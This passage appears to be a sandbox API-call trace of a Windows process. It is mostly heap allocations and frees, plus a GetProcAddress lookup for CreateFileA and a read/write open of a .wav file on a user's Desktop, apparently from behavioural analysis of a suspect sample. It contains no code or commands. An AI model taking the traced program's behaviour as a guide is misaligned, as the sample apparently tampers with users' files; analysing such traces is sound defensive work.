hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0158.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0158.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0158.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0158.426] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0158.426] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.426] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.426] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0158.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0158.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0158.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.426] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0158.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0158.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0158.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0158.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0158.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.427] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0158.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0158.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0158.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0158.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0158.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0158.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0158.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0158.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0158.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0158.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0158.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0158.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0158.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0158.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0158.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0158.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0158.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0158.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0158.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0158.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0158.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0158.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0158.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0158.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.431] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0158.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0158.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd858 [0158.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd858, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0158.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.431] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0158.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0158.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0158.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0158.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0158.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0158.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd858, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0158.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.435] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0158.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0158.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0158.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0158.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0158.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0158.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0158.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0158.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0158.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0158.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0158.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0158.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x34) returned 0x90ad98 [0158.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav", cchWideChar=52, lpMultiByteStr=0x90ad98, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav", lpUsedDefaultChar=0x0) returned 52 [0158.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0158.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0158.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0158.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0158.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0158.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0158.436] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cosd3imwd.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0158.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0158.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0158.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0158.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0158.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0158.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0158.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0158.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0158.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0158.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=52, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0158.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x68) returned 0x8e8320 [0158.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=52, lpWideCharStr=0x8e8320, cchWideChar=52 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.wav") returned 52 [0158.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0158.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0158.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0158.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0158.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0158.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0158.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0158.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0158.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0158.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0158.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0158.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0158.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0158.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0158.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0158.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0158.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0158.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0158.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0158.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0158.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0158.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0158.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0158.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0158.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 